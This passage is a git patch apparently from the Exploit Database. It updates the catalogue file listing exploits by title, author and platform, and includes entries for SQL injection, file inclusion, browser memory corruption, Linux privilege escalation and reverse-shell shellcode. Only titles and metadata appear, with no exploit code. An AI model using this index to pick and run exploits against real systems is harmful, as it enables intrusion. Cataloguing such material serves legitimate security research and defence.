From fb1dd3709fe9b3f2f67a7aba042e5f88d2811042 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 8 Dec 2016 05:01:21 +0000 Subject: [PATCH] DB: 2016-12-08 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 12 new exploits vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption XChat - Heap Overflow Denial of Service XChat 2.8.9 - Heap Overflow Denial of Service Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (1) Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1) glibc - getaddrinfo Stack Based Buffer Overflow (1) glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC) Microsoft Edge - JSON.parse Info Leak Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125) Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009) Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068) Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC) Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1) Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2) Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Microsoft PowerShell - XML External Entity Injection XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7' XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7) Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap glibc - getaddrinfo Stack Based Buffer Overflow (2) glibc - 'getaddrinfo' Stack Based Buffer Overflow Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056) Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes) Gravity Board X 1.1 - (csscontent) Remote Code Execution Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion Mambo Component ExtCalendar 2.0 - Remote File Inclusion Mambo Component com_babackup 1.1 - File Inclusion Mambo Component bigAPE-Backup 1.1 - File Inclusion E-Smart Cart 1.0 - 'Product_ID' SQL Injection E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion Cartweaver - 'Details.cfm ProdID' SQL Injection Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection xeCMS 1.x - (view.php list) Remote File Disclosure xeCMS 1.x - 'view.php' Remote File Disclosure Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection Mambo Component Portfolio Manager 1.0 - 'categoryId' Parameter SQL Injection Easy-Clanpage 2.2 - 'id' SQL Injection Easy-Clanpage 2.2 - 'id' Parameter SQL Injection JAMM CMS - 'id' Blind SQL Injection Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities JAMM CMS - 'id' Parameter Blind SQL Injection Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection Easy-Clanpage 3.0b1 - (section) Local File Inclusion WebChamado 1.1 - (tsk_id) SQL Injection Pre News Manager 1.0 - (index.php id) SQL Injection Pre Ads Portal 2.0 - SQL Injection Easy-Clanpage 3.0b1 - 'section' Parameter Local File Inclusion WebChamado 1.1 - 'tsk_id' Parameter SQL Injection Pre News Manager 1.0 - 'id' Parameter SQL Injection Pre ADS Portal 2.0 - SQL Injection GLLCTS2 - 'listing.php sort' Blind SQL Injection GLLCTS2 - 'sort' Parameter Blind SQL Injection Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting PHPMyCart - 'shop.php cat' SQL Injection SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion Cartweaver 3 - (prodId) Blind SQL Injection DIY - (index_topic did) Blind SQL Injection PHPMyCart 1.3 - 'cat' Parameter SQL Injection SHOUTcast Admin Panel 2.0 - 'page' Parameter Local File Inclusion Cartweaver 3 - 'prodId' Parameter Blind SQL Injection DIY - 'did' Parameter Blind SQL Injection ezcms 1.2 - (Blind SQL Injection / Authentication Bypass) Multiple Vulnerabilities PHPEasyNews 1.13 RC2 - (POST) SQL Injection ezcms 1.2 - Blind SQL Injection / Authentication Bypass PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection Devalcms 1.4a - (currentfile) Local File Inclusion Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion IPTBB 0.5.6 - (index.php act) Local File Inclusion IPTBB 0.5.6 - 'act' Parameter Local File Inclusion Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection Mambo Component Articles - 'artid' Parameter Blind SQL Injection Mambo Component 'com_n-gallery' - Multiple SQL Injections Mambo Component N-Gallery - Multiple SQL Injections devalcms 1.4a - Cross-Site Scripting / Remote Code Execution Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection PHP JOBWEBSITE PRO - Authentication Bypass Pre ADS Portal 2.0 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection Mambo Component n-form - 'form_id' Parameter Blind SQL Injection Pre Job Board - (Authentication Bypass) SQL Injection Pre Job Board - Authentication Bypass Butterfly ORGanizer 2.0.1 - (view.php id) SQL Injection Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection facil-cms 0.1rc2 - Multiple Vulnerabilities Facil-CMS 0.1RC2 - Multiple Vulnerabilities Family Connections CMS 1.9 - (member) SQL Injection Family Connections CMS 1.9 - SQL Injection Mambo Component 'com_hestar' - SQL Injection Mambo Component Hestar - SQL Injection Joomla! / Mambo Component 'com_tupinambis' - SQL Injection Joomla! / Mambo Component Tupinambis - SQL Injection Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion Mambo Component 'com_materialsuche' 1.0 - SQL Injection Mambo Component Material Suche 1.0 - SQL Injection Pre ADS Portal - 'cid' SQL Injection Pre ADS Portal - 'cid' Parameter SQL Injection Pre News Manager - (nid) SQL Injection Pre News Manager - 'nid' Parameter SQL Injection Mambo Component 'com_akogallery' - SQL Injection Mambo Component AkoGallery - SQL Injection Mambo Component 'com_mambads' - SQL Injection Mambo Component MambAds - SQL Injection Facil-CMS - (Local File Inclusion / Remote File Inclusion) Facil-CMS 0.1RC2 - Local / Remote File Inclusion AskMe Pro 2.1 - (que_id) SQL Injection Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection Pre Job Board Pro - SQL Injection Authentication Bypass Pre Job Board Pro - Authentication Bypass DiY-CMS 1.0 - Multiple Remote File Inclusion DIY-CMS 1.0 - Multiple Remote File Inclusion Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection Alstrasoft AskMe Pro 2.1 - (profile.php?id) SQL Injection Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection Pre Ads Portal - SQL Bypass Pre ADS Portal - Authentication Bypass Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection Family Connections CMS 2.5.0 / 2.7.1 - (less.php) Remote Command Execution Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution Family Connections CMS - 'less.php' Remote Command Execution (Metasploit) Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit) Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting Clever Copy 3.0 - Connect.INC Information Disclosure Clever Copy 3.0 - 'Connect.INC' Information Disclosure Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection Cartweaver 2.16.11 - 'Results.cfm' SQL Injection Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection Joomla! / Mambo Component Filebase - 'filecatid' Parameter SQL Injection Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection Conkurent PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection Mambo Component Docman 1.3.0 - Multiple SQL Injection Mambo Component 'com_n-skyrslur' - Cross-Site Scripting Mambo Component N-Skyrslur - Cross-Site Scripting Mambo Component 'com_n-gallery' - SQL Injection Mambo Component N-Gallery - SQL Injection Mambo Component 'com_n-press' - SQL Injection Mambo Component N-Press - SQL Injection Mambo Component 'com_n-frettir' - SQL Injection Mambo Component 'com_n-myndir' - SQL Injection Mambo Component N-Frettir - SQL Injection Mambo Component N-Myndir - SQL Injection AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities Edge SkateShop - Authentication bypass AbanteCart 1.2.7 - Cross-Site Scripting --- files.csv | 192 +++++++++-------- platforms/android/dos/40876.txt | 169 +++++++++++++++ platforms/android/remote/40874.txt | 91 ++++++++ platforms/cfm/webapps/27854.txt | 7 - platforms/lin_x86/shellcode/40872.c | 113 ++++++++++ platforms/linux/remote/40339.py | 1 - platforms/php/webapps/14979.txt | 28 --- platforms/php/webapps/17050.txt | 2 +- platforms/php/webapps/26110.txt | 7 - platforms/php/webapps/38312.txt | 15 -- platforms/php/webapps/40877.txt | 27 +++ platforms/php/webapps/40882.txt | 44 ++++ platforms/windows/dos/40875.html | 64 ++++++ platforms/windows/dos/40878.txt | 32 +++ platforms/windows/dos/40879.html | 42 ++++ platforms/windows/dos/40880.txt | 75 +++++++ platforms/windows/dos/40883.py | 59 +++++ platforms/windows/local/40873.txt | 212 ++++++++++++++++++ platforms/windows/remote/40881.html | 322 ++++++++++++++++++++++++++++ 19 files changed, 1351 insertions(+), 151 deletions(-) create mode 100755 platforms/android/dos/40876.txt create mode 100755 platforms/android/remote/40874.txt delete mode 100755 platforms/cfm/webapps/27854.txt create mode 100755 platforms/lin_x86/shellcode/40872.c delete mode 100755 platforms/php/webapps/14979.txt delete mode 100755 platforms/php/webapps/26110.txt delete mode 100755 platforms/php/webapps/38312.txt create mode 100755 platforms/php/webapps/40877.txt create mode 100755 platforms/php/webapps/40882.txt create mode 100755 platforms/windows/dos/40875.html create mode 100755 platforms/windows/dos/40878.txt create mode 100755 platforms/windows/dos/40879.html create mode 100755 platforms/windows/dos/40880.txt create mode 100755 platforms/windows/dos/40883.py create mode 100755 platforms/windows/local/40873.txt create mode 100755 platforms/windows/remote/40881.html diff --git a/files.csv b/files.csv index 03a1c8685..9e65807c8 100644 --- a/files.csv +++ b/files.csv @@ -739,7 +739,7 @@ id,file,description,date,author,platform,type,port 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0 5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 -5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0 +5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption",2008-06-14,"Praveen Darshanam",linux,dos,0 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0 5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0 5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - 'vb6skit.dll' Buffer Overflow (PoC)",2008-06-18,shinnai,windows,dos,0 @@ -2074,7 +2074,7 @@ id,file,description,date,author,platform,type,port 18116,platforms/multiple/dos/18116.html,"Mozilla Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos,0 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service",2011-11-18,hellok,windows,dos,0 18140,platforms/windows/dos/18140.c,"Microsoft Winows 7 - Keyboard Layout Blue Screen of Death (MS10-073)",2011-11-21,instruder,windows,dos,0 -18159,platforms/linux/dos/18159.py,"XChat - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0 +18159,platforms/linux/dos/18159.py,"XChat 2.8.9 - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 - Malformed .bed file Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0 @@ -4980,14 +4980,14 @@ id,file,description,date,author,platform,type,port 39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0 39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0 -39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 +39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0 39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 -39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow (1)",2016-02-16,"Google Security Research",linux,dos,0 +39454,platforms/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",linux,dos,0 39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0 39461,platforms/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0 39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0 @@ -5288,6 +5288,12 @@ id,file,description,date,author,platform,type,port 40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0 40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0 40866,platforms/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,linux,dos,0 +40875,platforms/windows/dos/40875.html,"Microsoft Edge - JSON.parse Info Leak",2016-12-06,"Google Security Research",windows,dos,0 +40876,platforms/android/dos/40876.txt,"Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index",2016-12-06,"Google Security Research",android,dos,0 +40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0 +40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0 +40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0 +40883,platforms/windows/dos/40883.py,"Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -6578,7 +6584,7 @@ id,file,description,date,author,platform,type,port 15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0 -15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 +15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Buffer Overflow",2010-12-11,zota,windows,local,0 @@ -6792,7 +6798,7 @@ id,file,description,date,author,platform,type,port 17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - '.plf' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0 17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0 17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)",2011-09-01,Metasploit,windows,local,0 -17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2)",2011-09-05,"Jon Oberheide",linux,local,0 +17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation",2011-09-05,"Jon Oberheide",linux,local,0 17777,platforms/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)",2011-09-03,Metasploit,windows,local,0 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (1)",2011-09-05,blake,windows,local,0 17783,platforms/windows/local/17783.pl,"ZipX 1.71 - '.ZIP' File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local,0 @@ -8677,6 +8683,7 @@ id,file,description,date,author,platform,type,port 40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0 40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0 40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0 +40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9649,7 +9656,7 @@ id,file,description,date,author,platform,type,port 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - 'TextOut.dll' ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote,0 -5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7'",2008-06-13,securfrog,windows,remote,0 +5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)",2008-06-13,securfrog,windows,remote,0 5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0 @@ -13292,6 +13299,7 @@ id,file,description,date,author,platform,type,port 26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,hardware,remote,0 26299,platforms/windows/remote/26299.c,"MultiTheftAuto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0 +40874,platforms/android/remote/40874.txt,"Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",android,remote,0 26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow (Metasploit)",2013-06-11,Metasploit,windows,remote,0 26135,platforms/multiple/remote/26135.rb,"Java Applet - Driver Manager Privileged toString() Remote Code Execution (Metasploit)",2013-06-11,Metasploit,multiple,remote,0 @@ -14353,7 +14361,7 @@ id,file,description,date,author,platform,type,port 34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",multiple,remote,0 34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",windows,remote,0 34478,platforms/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",windows,remote,0 -40339,platforms/linux/remote/40339.py,"glibc - getaddrinfo Stack Based Buffer Overflow (2)",2016-09-06,SpeeDr00t,linux,remote,0 +40339,platforms/linux/remote/40339.py,"glibc - 'getaddrinfo' Stack Based Buffer Overflow",2016-09-06,SpeeDr00t,linux,remote,0 34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,multiple,remote,0 34507,platforms/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 34517,platforms/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,windows,remote,5466 @@ -15129,6 +15137,7 @@ id,file,description,date,author,platform,type,port 40867,platforms/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote,0 40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0 +40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15730,6 +15739,7 @@ id,file,description,date,author,platform,type,port 40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital 